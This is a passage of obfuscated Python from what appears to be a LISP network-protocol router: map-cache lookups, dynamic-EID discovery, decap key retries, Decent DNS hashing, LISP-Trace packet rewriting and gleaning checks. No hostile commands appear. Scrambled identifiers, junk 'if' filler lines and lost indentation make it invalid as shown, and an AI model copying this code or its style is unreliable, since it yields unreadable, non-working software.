o0oO0o00 = lisp_map_cache_lookup ( i1I1I , OO0ooOo0ooooo )
if ( o0oO0o00 == None or o0oO0o00 . action == LISP_SEND_MAP_REQUEST_ACTION ) :
if 27 - 27: I1IiiI + I1ii11iIi11i * I1Ii111 % Ii1I - Oo0Ooo
if 87 - 87: i11iIiiIii % OOooOOo - OoOoOO00 * ooOoO0o / Oo0Ooo
if 74 - 74: OoooooooOO * ooOoO0o - I11i / I1ii11iIi11i % iIii1I11I1II1
if 94 - 94: Ii1I * I1Ii111 + OoOoOO00 . iIii1I11I1II1
if 44 - 44: Oo0Ooo . Oo0Ooo * Oo0Ooo
if ( lisp_rate_limit_map_request ( OO0ooOo0ooooo ) ) : return
lisp_send_map_request ( lisp_send_sockets , lisp_ephem_port ,
i1I1I , OO0ooOo0ooooo , None )
else :
iIIi1iI1I1IIi = green ( OO0ooOo0ooooo . print_address ( ) , False )
lprint ( "Map-cache entry for {} already exists" . format ( iIIi1iI1I1IIi ) )
if 23 - 23: I1Ii111 / iII111i . O0 % II111iiii
if 67 - 67: I11i / iIii1I11I1II1 / ooOoO0o
return
if 90 - 90: II111iiii % I1Ii111 - IiII . Oo0Ooo % OOooOOo - OoOoOO00
if 89 - 89: Oo0Ooo - I1ii11iIi11i . I1Ii111
if 65 - 65: ooOoO0o % OOooOOo + OOooOOo % I1Ii111 . I1IiiI % O0
if 46 - 46: OoO0O00 * I1Ii111 + iII111i . oO0o % OOooOOo / i11iIiiIii
if 1 - 1: I1ii11iIi11i % O0 - I1ii11iIi11i / OoooooooOO / OoO0O00
if 82 - 82: i1IIi % Ii1I
if 85 - 85: I1Ii111 * i11iIiiIii * iIii1I11I1II1 % iIii1I11I1II1
def lisp_ipc_map_cache_entry ( mc , jdata ) :
i1ii1i1Ii11 = lisp_write_ipc_map_cache ( True , mc , dont_send = True )
jdata . append ( i1ii1i1Ii11 )
return ( [ True , jdata ] )
if 64 - 64: OoO0O00 / Ii1I
if 79 - 79: Ii1I % OOooOOo
if 39 - 39: I1ii11iIi11i / Ii1I - II111iiii . i1IIi
if 59 - 59: II111iiii
if 36 - 36: ooOoO0o . II111iiii - OoOoOO00 % I1ii11iIi11i * O0
if 91 - 91: iII111i + Oo0Ooo / OoooooooOO * iIii1I11I1II1 - OoO0O00
if 73 - 73: iIii1I11I1II1 % I1Ii111 % II111iiii * Oo0Ooo * OoO0O00
if 48 - 48: OOooOOo * i11iIiiIii - i11iIiiIii + iIii1I11I1II1 + I1IiiI % OoooooooOO
def lisp_ipc_walk_map_cache ( mc , jdata ) :
if 61 - 61: i1IIi
if 56 - 56: iIii1I11I1II1 / I11i * iII111i * I11i * OoooooooOO
if 44 - 44: I1ii11iIi11i - OOooOOo % I11i - I1Ii111 / iIii1I11I1II1 - OOooOOo
if 38 - 38: iIii1I11I1II1 - OoooooooOO * II111iiii . OoooooooOO + OOooOOo
if ( mc . group . is_null ( ) ) : return ( lisp_ipc_map_cache_entry ( mc , jdata ) )
if 59 - 59: OoooooooOO
if ( mc . source_cache == None ) : return ( [ True , jdata ] )
if 22 - 22: II111iiii
if 85 - 85: I1Ii111 + I1ii11iIi11i * I11i % o0oOOo0O0Ooo + Ii1I
if 23 - 23: IiII * OoO0O00
if 42 - 42: IiII
if 83 - 83: i1IIi * o0oOOo0O0Ooo / OoO0O00 / o0oOOo0O0Ooo
jdata = mc . source_cache . walk_cache ( lisp_ipc_map_cache_entry , jdata )
return ( [ True , jdata ] )
if 55 - 55: Oo0Ooo % O0 - OoO0O00
if 42 - 42: OoooooooOO * OOooOOo
if 93 - 93: OOooOOo + II111iiii . oO0o * Oo0Ooo - O0 + I1Ii111
if 99 - 99: OoO0O00 * o0oOOo0O0Ooo + OoOoOO00 * iIii1I11I1II1
if 38 - 38: I1ii11iIi11i - OOooOOo * O0 - I1ii11iIi11i
if 95 - 95: OoO0O00 . oO0o . OoooooooOO - iIii1I11I1II1
if 35 - 35: o0oOOo0O0Ooo / OoooooooOO - i1IIi * iIii1I11I1II1 + ooOoO0o
def lisp_itr_discover_eid ( db , eid , input_interface , routed_interface ,
lisp_ipc_listen_socket ) :
Ii1i1 = eid . print_address ( )
if ( db . dynamic_eids . has_key ( Ii1i1 ) ) :
db . dynamic_eids [ Ii1i1 ] . last_packet = lisp_get_timestamp ( )
return
if 66 - 66: Oo0Ooo - OoOoOO00 . I1Ii111 + O0 + o0oOOo0O0Ooo
if 36 - 36: II111iiii % IiII . i11iIiiIii
if 88 - 88: Oo0Ooo . IiII * Oo0Ooo
if 92 - 92: I1IiiI % IiII
if 95 - 95: OoooooooOO / OoO0O00 % O0 / I1Ii111 * Ii1I + I1ii11iIi11i
OO0oOo = lisp_dynamic_eid ( )
OO0oOo . dynamic_eid . copy_address ( eid )
OO0oOo . interface = routed_interface
OO0oOo . last_packet = lisp_get_timestamp ( )
OO0oOo . get_timeout ( routed_interface )
db . dynamic_eids [ Ii1i1 ] = OO0oOo
if 7 - 7: ooOoO0o
OOO00 = ""
if ( input_interface != routed_interface ) :
OOO00 = ", routed-interface " + routed_interface
if 93 - 93: o0oOOo0O0Ooo . I11i . I1ii11iIi11i % Oo0Ooo
if 21 - 21: II111iiii - I1IiiI / OoooooooOO . OoOoOO00 . OOooOOo
i1I = green ( Ii1i1 , False ) + bold ( " discovered" , False )
lprint ( "Dynamic-EID {} on interface {}{}, timeout {}" . format ( i1I , input_interface , OOO00 , OO0oOo . timeout ) )
if 85 - 85: ooOoO0o + I1Ii111 - O0 * I11i / i1IIi
if 66 - 66: ooOoO0o % I1Ii111 - O0 + I1Ii111 - i1IIi % OoOoOO00
if 13 - 13: O0 + iIii1I11I1II1 % I1IiiI * O0 + ooOoO0o
if 60 - 60: iIii1I11I1II1 + OoooooooOO - OoO0O00
if 44 - 44: O0 . OOooOOo . o0oOOo0O0Ooo . I1ii11iIi11i - II111iiii
oOOO0oo0 = "learn%{}%{}" . format ( Ii1i1 , routed_interface )
oOOO0oo0 = lisp_command_ipc ( oOOO0oo0 , "lisp-itr" )
lisp_ipc ( oOOO0oo0 , lisp_ipc_listen_socket , "lisp-etr" )
return
if 71 - 71: I1ii11iIi11i + o0oOOo0O0Ooo . i11iIiiIii * oO0o . i1IIi
if 40 - 40: OoO0O00 - IiII
if 43 - 43: I1Ii111 + i11iIiiIii % iII111i % I1Ii111 - ooOoO0o
if 85 - 85: IiII % iIii1I11I1II1 . I1Ii111
if 38 - 38: iII111i - I1IiiI / ooOoO0o
if 46 - 46: OOooOOo . O0 / i11iIiiIii . OOooOOo
if 19 - 19: I11i / Oo0Ooo + I1Ii111
if 43 - 43: I1ii11iIi11i
if 18 - 18: I11i / OOooOOo % I11i - o0oOOo0O0Ooo
if 22 - 22: iII111i
if 88 - 88: I11i + OoOoOO00 % IiII % OoO0O00 * O0 / OoooooooOO
if 83 - 83: IiII + I1Ii111 . I1ii11iIi11i * iIii1I11I1II1
if 9 - 9: ooOoO0o % IiII - OoOoOO00
def lisp_retry_decap_keys ( addr_str , packet , iv , packet_icv ) :
if ( lisp_search_decap_keys == False ) : return
if 66 - 66: oO0o % Oo0Ooo
if 40 - 40: i11iIiiIii . O0 * I11i - oO0o / OOooOOo . oO0o
if 86 - 86: OOooOOo - I1Ii111 * IiII - i1IIi + ooOoO0o + I11i
if 32 - 32: IiII
if ( addr_str . find ( ":" ) != - 1 ) : return
if 99 - 99: II111iiii
O0Ii1IiiiI = lisp_crypto_keys_by_rloc_decap [ addr_str ]
if 34 - 34: OOooOOo + OoOoOO00 * o0oOOo0O0Ooo + I1ii11iIi11i + IiII * i1IIi
for o0Oo in lisp_crypto_keys_by_rloc_decap :
if 73 - 73: I1ii11iIi11i - IiII - O0 . oO0o + Oo0Ooo % iII111i
if 68 - 68: I1ii11iIi11i - OoooooooOO
if 5 - 5: I1ii11iIi11i * I1IiiI + OoooooooOO / Oo0Ooo
if 18 - 18: OoO0O00 * iII111i % I1IiiI . OOooOOo * o0oOOo0O0Ooo
if ( o0Oo . find ( addr_str ) == - 1 ) : continue
if 58 - 58: iII111i . IiII + iIii1I11I1II1
if 13 - 13: oO0o * I1Ii111 / I1Ii111 . I1IiiI
if 93 - 93: I11i % OoOoOO00 - OOooOOo + iIii1I11I1II1 / OoooooooOO % i11iIiiIii
if 90 - 90: oO0o % iIii1I11I1II1 + o0oOOo0O0Ooo - I11i / i11iIiiIii
if ( o0Oo == addr_str ) : continue
if 57 - 57: I1IiiI . Oo0Ooo / I1IiiI / II111iiii - I1Ii111
if 68 - 68: I1IiiI
if 97 - 97: Ii1I + o0oOOo0O0Ooo / OoO0O00
if 97 - 97: i11iIiiIii % iIii1I11I1II1 + II111iiii
i1ii1i1Ii11 = lisp_crypto_keys_by_rloc_decap [ o0Oo ]
if ( i1ii1i1Ii11 == O0Ii1IiiiI ) : continue
if 90 - 90: OOooOOo / I1IiiI
if 28 - 28: OoooooooOO + i1IIi
if 29 - 29: Oo0Ooo
if 98 - 98: OOooOOo / Oo0Ooo % Ii1I * OoooooooOO - oO0o
ooO00O0OO = i1ii1i1Ii11 [ 1 ]
if ( packet_icv != ooO00O0OO . do_icv ( packet , iv ) ) :
lprint ( "Test ICV with key {} failed" . format ( red ( o0Oo , False ) ) )
continue
if 19 - 19: OOooOOo + Ii1I
if 34 - 34: i11iIiiIii + I1Ii111 / O0 / iIii1I11I1II1 * OoooooooOO % Ii1I
lprint ( "Changing decap crypto key to {}" . format ( red ( o0Oo , False ) ) )
lisp_crypto_keys_by_rloc_decap [ addr_str ] = i1ii1i1Ii11
if 32 - 32: i11iIiiIii - OoOoOO00 / iIii1I11I1II1 * o0oOOo0O0Ooo % I1IiiI + O0
return
if 36 - 36: I1ii11iIi11i + I1ii11iIi11i % I1Ii111 * ooOoO0o * OoOoOO00
if 54 - 54: Oo0Ooo - I1IiiI % OOooOOo . I1ii11iIi11i / I1IiiI
if 75 - 75: OOooOOo - O0 % iII111i . Ii1I % I1ii11iIi11i + I1ii11iIi11i
if 32 - 32: Ii1I + II111iiii * IiII
if 9 - 9: I1Ii111
if 96 - 96: I1Ii111 / iIii1I11I1II1
if 48 - 48: iII111i * IiII + OoooooooOO
if 63 - 63: I1IiiI / Ii1I
def lisp_decent_pull_xtr_configured ( ) :
return ( lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None )
if 31 - 31: i1IIi - oO0o
if 99 - 99: iII111i - i11iIiiIii + oO0o
if 66 - 66: Oo0Ooo * I11i . iIii1I11I1II1 - OoO0O00
if 11 - 11: I1Ii111 + iIii1I11I1II1 * O0 * Oo0Ooo
if 66 - 66: OoooooooOO % OoO0O00 + i11iIiiIii + I1Ii111 % OoO0O00
if 80 - 80: Oo0Ooo - Ii1I
if 54 - 54: O0 - iIii1I11I1II1 . OoO0O00 . IiII % OoO0O00
if 28 - 28: O0 % i1IIi % OoO0O00 / o0oOOo0O0Ooo . iIii1I11I1II1 - iII111i
def lisp_is_decent_dns_suffix ( dns_name ) :
if ( lisp_decent_dns_suffix == None ) : return ( False )
II1 = dns_name . split ( "." )
II1 = "." . join ( II1 [ 1 : : ] )
return ( II1 == lisp_decent_dns_suffix )
if 50 - 50: o0oOOo0O0Ooo + iII111i / i1IIi % II111iiii
if 61 - 61: IiII
if 5 - 5: OOooOOo % iIii1I11I1II1 % O0 * i11iIiiIii / I1Ii111
if 48 - 48: IiII * oO0o
if 53 - 53: i1IIi * iIii1I11I1II1 . OOooOOo
if 68 - 68: IiII % IiII - iII111i . IiII + OoooooooOO
if 82 - 82: Ii1I . II111iiii / i1IIi * OoO0O00
def lisp_get_decent_index ( eid ) :
Ii1i1 = eid . print_prefix ( )
o00Oo0Oo0o = hashlib . sha256 ( Ii1i1 ) . hexdigest ( )
ooo = int ( o00Oo0Oo0o , 16 ) % lisp_decent_modulus
return ( ooo )
if 66 - 66: OoO0O00 * oO0o * iII111i
if 37 - 37: ooOoO0o / o0oOOo0O0Ooo + O0 % i11iIiiIii . ooOoO0o . Oo0Ooo
if 32 - 32: IiII * IiII * OoOoOO00
if 17 - 17: Oo0Ooo / iII111i
if 29 - 29: ooOoO0o
if 20 - 20: II111iiii % I1ii11iIi11i - OoooooooOO * Ii1I / I11i - OoooooooOO
if 11 - 11: I1IiiI + Ii1I + i11iIiiIii * I1ii11iIi11i - oO0o
def lisp_get_decent_dns_name ( eid ) :
ooo = lisp_get_decent_index ( eid )
return ( str ( ooo ) + "." + lisp_decent_dns_suffix )
if 46 - 46: OoooooooOO - Oo0Ooo
if 4 - 4: II111iiii . OOooOOo - Ii1I - i11iIiiIii
if 27 - 27: iII111i * iII111i - OoO0O00 % o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 64 - 64: I1ii11iIi11i * ooOoO0o - OoooooooOO - I1IiiI
if 59 - 59: I1ii11iIi11i . I1Ii111 - OOooOOo / Oo0Ooo + OOooOOo . I1ii11iIi11i
if 69 - 69: Oo0Ooo
if 34 - 34: I1Ii111 - ooOoO0o . o0oOOo0O0Ooo
if 52 - 52: o0oOOo0O0Ooo % I11i * I11i / iIii1I11I1II1
def lisp_get_decent_dns_name_from_str ( iid , eid_str ) :
iiI1I1IIi = lisp_address ( LISP_AFI_NONE , eid_str , 0 , iid )
ooo = lisp_get_decent_index ( iiI1I1IIi )
return ( str ( ooo ) + "." + lisp_decent_dns_suffix )
if 77 - 77: OoOoOO00
if 67 - 67: OoooooooOO / OoooooooOO + IiII - ooOoO0o
if 72 - 72: Ii1I
if 21 - 21: ooOoO0o + iII111i
if 39 - 39: o0oOOo0O0Ooo % I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo
if 78 - 78: OoO0O00 / o0oOOo0O0Ooo / O0 % OOooOOo % i1IIi
if 78 - 78: o0oOOo0O0Ooo - oO0o . II111iiii
if 67 - 67: iII111i + I11i - OoO0O00 . OOooOOo * iIii1I11I1II1
if 44 - 44: OoooooooOO * i1IIi % i1IIi - i11iIiiIii % OOooOOo - OoO0O00
if 62 - 62: OOooOOo + OoooooooOO / I1Ii111 % iIii1I11I1II1
def lisp_trace_append ( packet , reason = None , ed = "encap" , lisp_socket = None ,
rloc_entry = None ) :
if 59 - 59: i11iIiiIii . IiII
oO0ooOoO = 28 if packet . inner_version == 4 else 48
oOO00 = packet . packet [ oO0ooOoO : : ]
O0oOo0O0O = lisp_trace ( )
if ( O0oOo0O0O . decode ( oOO00 ) == False ) :
lprint ( "Could not decode JSON portion of a LISP-Trace packet" )
return ( False )
if 32 - 32: i1IIi - iII111i + o0oOOo0O0Ooo * I1Ii111 % I1ii11iIi11i / i11iIiiIii
if 91 - 91: IiII / OoooooooOO . OoooooooOO + OoooooooOO * I1ii11iIi11i . OoOoOO00
iiI11IiI1 = "?" if packet . outer_dest . is_null ( ) else packet . outer_dest . print_address_no_iid ( )
if 56 - 56: I1ii11iIi11i * II111iiii + Ii1I / OoO0O00
if 45 - 45: O0 * OoO0O00 / I11i . II111iiii
if 20 - 20: I11i - IiII
if 75 - 75: i11iIiiIii + I11i % I11i . I1Ii111
if 58 - 58: o0oOOo0O0Ooo * II111iiii + o0oOOo0O0Ooo . I1IiiI
if 25 - 25: o0oOOo0O0Ooo * I11i
if ( iiI11IiI1 != "?" and packet . encap_port != LISP_DATA_PORT ) :
if ( ed == "encap" ) : iiI11IiI1 += ":{}" . format ( packet . encap_port )
if 70 - 70: OOooOOo
if 11 - 11: I11i * II111iiii * Oo0Ooo + OOooOOo % i1IIi
if 73 - 73: OoO0O00 + O0 / Ii1I . OoooooooOO % iIii1I11I1II1 * i1IIi
if 84 - 84: o0oOOo0O0Ooo . iII111i / o0oOOo0O0Ooo + I1ii11iIi11i % OoO0O00
if 52 - 52: OoOoOO00 / Ii1I % OoOoOO00 % i11iIiiIii + I1IiiI / o0oOOo0O0Ooo
i1ii1i1Ii11 = { }
i1ii1i1Ii11 [ "node" ] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else "RTR" if lisp_i_am_rtr else "?"
if 63 - 63: I1IiiI
iIIiI1I = packet . outer_source
if ( iIIiI1I . is_null ( ) ) : iIIiI1I = lisp_myrlocs [ 0 ]
i1ii1i1Ii11 [ "srloc" ] = iIIiI1I . print_address_no_iid ( )
if 82 - 82: I1IiiI * i11iIiiIii / Ii1I / OOooOOo
if 62 - 62: I1Ii111 / Ii1I
if 71 - 71: I1Ii111
if 4 - 4: ooOoO0o * OoOoOO00 * o0oOOo0O0Ooo - iII111i - o0oOOo0O0Ooo * OOooOOo
if 91 - 91: OoOoOO00 * II111iiii % I1ii11iIi11i
if ( i1ii1i1Ii11 [ "node" ] == "ITR" and packet . inner_sport != LISP_TRACE_PORT ) :
i1ii1i1Ii11 [ "srloc" ] += ":{}" . format ( packet . inner_sport )
if 89 - 89: OOooOOo - Oo0Ooo . I1ii11iIi11i - I1IiiI
if 1 - 1: iIii1I11I1II1
i1ii1i1Ii11 [ "hn" ] = lisp_hostname
o0Oo = ed + "-ts"
i1ii1i1Ii11 [ o0Oo ] = lisp_get_timestamp ( )
if 100 - 100: Oo0Ooo % OoooooooOO
if 28 - 28: oO0o . o0oOOo0O0Ooo
if 14 - 14: Oo0Ooo - I1Ii111 + Oo0Ooo / iII111i
if 61 - 61: Ii1I * Ii1I . OoOoOO00 + OoO0O00 * i11iIiiIii * OoO0O00
if 4 - 4: OoooooooOO % iII111i % Oo0Ooo * IiII % o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 66 - 66: I1IiiI . Oo0Ooo - oO0o
if ( iiI11IiI1 == "?" and i1ii1i1Ii11 [ "node" ] == "ETR" ) :
Oooo00oo = lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( Oooo00oo != None and len ( Oooo00oo . rloc_set ) >= 1 ) :
iiI11IiI1 = Oooo00oo . rloc_set [ 0 ] . rloc . print_address_no_iid ( )
if 53 - 53: oO0o / Ii1I + oO0o + II111iiii
if 70 - 70: OoooooooOO - I1Ii111 + OoOoOO00
i1ii1i1Ii11 [ "drloc" ] = iiI11IiI1
if 61 - 61: I1IiiI * I1Ii111 * i11iIiiIii
if 68 - 68: OoOoOO00 - iII111i - I1IiiI
if 37 - 37: iII111i - I1Ii111 + i1IIi / o0oOOo0O0Ooo % iII111i / iII111i
if 8 - 8: i1IIi % I11i
if ( iiI11IiI1 == "?" and reason != None ) :
i1ii1i1Ii11 [ "drloc" ] += " ({})" . format ( reason )
if 12 - 12: ooOoO0o / II111iiii + ooOoO0o * I1ii11iIi11i / i1IIi - iIii1I11I1II1
if 71 - 71: IiII - i11iIiiIii
if 3 - 3: i11iIiiIii - o0oOOo0O0Ooo / oO0o . OoO0O00 * I11i + o0oOOo0O0Ooo
if 18 - 18: OoooooooOO % oO0o / IiII - ooOoO0o
if 80 - 80: I11i
if ( rloc_entry != None ) :
i1ii1i1Ii11 [ "rtts" ] = rloc_entry . recent_rloc_probe_rtts
i1ii1i1Ii11 [ "hops" ] = rloc_entry . recent_rloc_probe_hops
i1ii1i1Ii11 [ "latencies" ] = rloc_entry . recent_rloc_probe_latencies
if 98 - 98: iII111i / I1ii11iIi11i
if 87 - 87: iII111i - O0 * ooOoO0o / II111iiii % OoooooooOO . o0oOOo0O0Ooo
if 55 - 55: OOooOOo - o0oOOo0O0Ooo * I1IiiI / o0oOOo0O0Ooo + I1Ii111 + iIii1I11I1II1
if 3 - 3: II111iiii % iII111i / IiII * ooOoO0o . OoooooooOO
if 56 - 56: IiII * II111iiii + Oo0Ooo - O0 - OoO0O00 . I1Ii111
if 53 - 53: i1IIi + IiII
i1I1I = packet . inner_source . print_address ( )
OO0ooOo0ooooo = packet . inner_dest . print_address ( )
if ( O0oOo0O0O . packet_json == [ ] ) :
i1II111ii1i = { }
i1II111ii1i [ "seid" ] = i1I1I
i1II111ii1i [ "deid" ] = OO0ooOo0ooooo
i1II111ii1i [ "paths" ] = [ ]
O0oOo0O0O . packet_json . append ( i1II111ii1i )
if 90 - 90: II111iiii / oO0o / oO0o . OoOoOO00 / OoO0O00 / iIii1I11I1II1
if 96 - 96: iIii1I11I1II1 % I1ii11iIi11i
if 35 - 35: i1IIi - OoooooooOO * Ii1I / OOooOOo % I11i
if 72 - 72: I1Ii111 / OoO0O00 + II111iiii
if 40 - 40: Ii1I + O0 . i11iIiiIii % I11i / Oo0Ooo
if 25 - 25: IiII * IiII
for i1II111ii1i in O0oOo0O0O . packet_json :
if ( i1II111ii1i [ "deid" ] != OO0ooOo0ooooo ) : continue
i1II111ii1i [ "paths" ] . append ( i1ii1i1Ii11 )
break
if 54 - 54: I1Ii111
if 90 - 90: Oo0Ooo / Ii1I
if 66 - 66: i11iIiiIii - I11i + oO0o . OoooooooOO
if 77 - 77: OoO0O00 / OOooOOo
if 97 - 97: OoOoOO00 / Ii1I * I1IiiI - Oo0Ooo % O0
if 66 - 66: O0 + I1IiiI % iIii1I11I1II1 . i1IIi % II111iiii - i1IIi
if 93 - 93: O0 + OoooooooOO % IiII % oO0o % I1ii11iIi11i
if 36 - 36: I1IiiI - oO0o * Oo0Ooo + oO0o % iII111i - i11iIiiIii
ooiIII = False
if ( len ( O0oOo0O0O . packet_json ) == 1 and i1ii1i1Ii11 [ "node" ] == "ETR" and
O0oOo0O0O . myeid ( packet . inner_dest ) ) :
i1II111ii1i = { }
i1II111ii1i [ "seid" ] = OO0ooOo0ooooo
i1II111ii1i [ "deid" ] = i1I1I
i1II111ii1i [ "paths" ] = [ ]
O0oOo0O0O . packet_json . append ( i1II111ii1i )
ooiIII = True
if 73 - 73: OoooooooOO
if 2 - 2: o0oOOo0O0Ooo % IiII + I1ii11iIi11i - i11iIiiIii
if 100 - 100: II111iiii + oO0o
if 85 - 85: I1ii11iIi11i % I1ii11iIi11i . Ii1I
if 42 - 42: oO0o + OoO0O00
if 16 - 16: Ii1I
O0oOo0O0O . print_trace ( )
oOO00 = O0oOo0O0O . encode ( )
if 67 - 67: I1ii11iIi11i . OoooooooOO * I1Ii111 + Ii1I * OOooOOo
if 84 - 84: OOooOOo
if 78 - 78: O0 % O0
if 72 - 72: o0oOOo0O0Ooo * IiII / II111iiii / iIii1I11I1II1
if 41 - 41: iII111i / Ii1I
if 11 - 11: Oo0Ooo % OOooOOo . ooOoO0o
if 24 - 24: IiII / Oo0Ooo
if 90 - 90: ooOoO0o . OOooOOo - Ii1I
Ooo00oOo0O0 = O0oOo0O0O . packet_json [ 0 ] [ "paths" ] [ 0 ] [ "srloc" ]
if ( iiI11IiI1 == "?" ) :
lprint ( "LISP-Trace return to sender RLOC {}" . format ( Ooo00oOo0O0 ) )
O0oOo0O0O . return_to_sender ( lisp_socket , Ooo00oOo0O0 , oOO00 )
return ( False )
if 11 - 11: OoO0O00
if 74 - 74: OoO0O00 - OOooOOo - ooOoO0o - iIii1I11I1II1
if 29 - 29: ooOoO0o
if 31 - 31: o0oOOo0O0Ooo / IiII - oO0o / OoOoOO00 * IiII * i1IIi
if 45 - 45: OoOoOO00 + iII111i % iIii1I11I1II1 - IiII * OOooOOo
if 62 - 62: Ii1I / Oo0Ooo / I1ii11iIi11i . OoOoOO00 % ooOoO0o * IiII
iIIIIi = O0oOo0O0O . packet_length ( )
if 97 - 97: ooOoO0o
if 14 - 14: iII111i + iII111i
if 62 - 62: ooOoO0o / OOooOOo * I1ii11iIi11i + Oo0Ooo - OoooooooOO - OoooooooOO
if 19 - 19: Ii1I . oO0o
if 26 - 26: OOooOOo + II111iiii
if 67 - 67: IiII + OoOoOO00 * I1ii11iIi11i % o0oOOo0O0Ooo / oO0o
I1i1 = packet . packet [ 0 : oO0ooOoO ]
IiI1i1i1 = struct . pack ( "HH" , socket . htons ( iIIIIi ) , 0 )
I1i1 = I1i1 [ 0 : oO0ooOoO - 4 ] + IiI1i1i1
if ( packet . inner_version == 6 and i1ii1i1Ii11 [ "node" ] == "ETR" and
len ( O0oOo0O0O . packet_json ) == 2 ) :
oOoO0OOO00O = I1i1 [ oO0ooOoO - 8 : : ] + oOO00
oOoO0OOO00O = lisp_udp_checksum ( i1I1I , OO0ooOo0ooooo , oOoO0OOO00O )
I1i1 = I1i1 [ 0 : oO0ooOoO - 8 ] + oOoO0OOO00O [ 0 : 8 ]
if 51 - 51: I1IiiI - Oo0Ooo . iII111i / I11i / Oo0Ooo
if 39 - 39: ooOoO0o
if 78 - 78: Oo0Ooo . I1IiiI * O0 * oO0o % OoOoOO00
if 99 - 99: Oo0Ooo - ooOoO0o . OoO0O00 - Oo0Ooo / O0
if 42 - 42: Ii1I - OoOoOO00 . OoOoOO00
if 88 - 88: o0oOOo0O0Ooo . Ii1I . iII111i * iII111i + i11iIiiIii
if ( ooiIII ) :
if ( packet . inner_version == 4 ) :
I1i1 = I1i1 [ 0 : 12 ] + I1i1 [ 16 : 20 ] + I1i1 [ 12 : 16 ] + I1i1 [ 22 : 24 ] + I1i1 [ 20 : 22 ] + I1i1 [ 24 : : ]
if 68 - 68: OoooooooOO
else :
I1i1 = I1i1 [ 0 : 8 ] + I1i1 [ 24 : 40 ] + I1i1 [ 8 : 24 ] + I1i1 [ 42 : 44 ] + I1i1 [ 40 : 42 ] + I1i1 [ 44 : : ]
if 5 - 5: OoOoOO00 . i11iIiiIii . OOooOOo / I11i * Oo0Ooo % Oo0Ooo
if 44 - 44: I1ii11iIi11i + oO0o % i1IIi + OoooooooOO
o0 = packet . inner_dest
packet . inner_dest = packet . inner_source
packet . inner_source = o0
if 42 - 42: I1Ii111 / I1Ii111 - O0
if 79 - 79: i11iIiiIii
if 96 - 96: iIii1I11I1II1 . OoOoOO00 . OOooOOo / iII111i
if 59 - 59: Oo0Ooo + OOooOOo / Oo0Ooo
if 49 - 49: OoO0O00 / Oo0Ooo % OoOoOO00 % i1IIi
oO0ooOoO = 2 if packet . inner_version == 4 else 4
oOooOOoOo00 = 20 + iIIIIi if packet . inner_version == 4 else iIIIIi
I1Iii = struct . pack ( "H" , socket . htons ( oOooOOoOo00 ) )
I1i1 = I1i1 [ 0 : oO0ooOoO ] + I1Iii + I1i1 [ oO0ooOoO + 2 : : ]
if 65 - 65: I1IiiI / II111iiii
if 55 - 55: OoooooooOO + i11iIiiIii % I11i - OOooOOo
if 49 - 49: O0 + I1IiiI . II111iiii
if 14 - 14: iIii1I11I1II1 * I11i + OoO0O00 - oO0o
if ( packet . inner_version == 4 ) :
IiiI11iIi = struct . pack ( "H" , 0 )
I1i1 = I1i1 [ 0 : 10 ] + IiiI11iIi + I1i1 [ 12 : : ]
I1Iii = lisp_ip_checksum ( I1i1 [ 0 : 20 ] )
I1i1 = I1Iii + I1i1 [ 20 : : ]
if 15 - 15: O0 + IiII
if 49 - 49: i1IIi - i11iIiiIii + II111iiii + Ii1I / OoO0O00
if 34 - 34: I1ii11iIi11i * i11iIiiIii
if 6 - 6: I1ii11iIi11i + I1IiiI / OoooooooOO % I11i * Oo0Ooo
if 20 - 20: Oo0Ooo
packet . packet = I1i1 + oOO00
return ( True )
if 85 - 85: I1Ii111
if 98 - 98: OoO0O00 - IiII % iIii1I11I1II1 . OoOoOO00 + i1IIi + OoooooooOO
if 29 - 29: I1ii11iIi11i * I1Ii111 - i1IIi * i11iIiiIii * iIii1I11I1II1 % I11i
if 73 - 73: OoO0O00 . I1IiiI / o0oOOo0O0Ooo
if 12 - 12: I11i * i11iIiiIii - O0 * o0oOOo0O0Ooo - IiII + I1IiiI
if 7 - 7: oO0o + I1Ii111 . o0oOOo0O0Ooo / IiII + iIii1I11I1II1 % I1Ii111
if 24 - 24: i11iIiiIii + iIii1I11I1II1
if 22 - 22: i11iIiiIii . II111iiii / o0oOOo0O0Ooo / Ii1I . O0 . OoOoOO00
if 89 - 89: O0 * Oo0Ooo + I1Ii111 + ooOoO0o * OoOoOO00
if 20 - 20: OoO0O00 - OoOoOO00
def lisp_allow_gleaning ( eid , group , rloc ) :
if ( lisp_glean_mappings == [ ] ) : return ( False , False , False )
if 84 - 84: iIii1I11I1II1 + ooOoO0o . o0oOOo0O0Ooo % iII111i
for i1ii1i1Ii11 in lisp_glean_mappings :
if ( i1ii1i1Ii11 . has_key ( "instance-id" ) ) :
IiIIi11i111 = eid . instance_id
OO00 , IiIIi1i = i1ii1i1Ii11 [ "instance-id" ]
if ( IiIIi11i111 < OO00 or IiIIi11i111 > IiIIi1i ) : continue
if 35 - 35: I11i - oO0o * oO0o / OoooooooOO + iII111i + OoOoOO00
if ( i1ii1i1Ii11 . has_key ( "eid-prefix" ) ) :
iIIi1iI1I1IIi = copy . deepcopy ( i1ii1i1Ii11 [ "eid-prefix" ] )
iIIi1iI1I1IIi . instance_id = eid . instance_id
if ( eid . is_more_specific ( iIIi1iI1I1IIi ) == False ) : continue
if 48 - 48: I1Ii111 / o0oOOo0O0Ooo - OOooOOo / o0oOOo0O0Ooo % O0
if ( i1ii1i1Ii11 . has_key ( "group-prefix" ) ) :
if ( group == None ) : continue
i11ii = copy . deepcopy ( i1ii1i1Ii11 [ "group-prefix" ] )
i11ii . instance_id = group . instance_id
if ( group . is_more_specific ( i11ii ) == False ) : continue
if 38 - 38: OoO0O00 + o0oOOo0O0Ooo / OoO0O00
if ( i1ii1i1Ii11 . has_key ( "rloc-prefix" ) ) :
if ( rloc != None and rloc . is_more_specific ( i1ii1i1Ii11 [ "rloc-prefix" ] )
== False ) : continue
if 74 - 74: oO0o - i1IIi . Oo0Ooo / I1IiiI + o0oOOo0O0Ooo . OoOoOO00
return ( True , i1ii1i1Ii11 [ "rloc-probe" ] , i1ii1i1Ii11 [ "igmp-query" ] )
if 35 - 35: iII111i / Ii1I
return ( False , False , False )
if 57 - 57: ooOoO0o . I1IiiI * OOooOOo
if 87 - 87: I11i - I11i % iII111i - Ii1I
if 29 - 29: oO0o - ooOoO0o * iIii1I11I1II1 / OoOoOO00
if 34 - 34: I1IiiI . Oo0Ooo
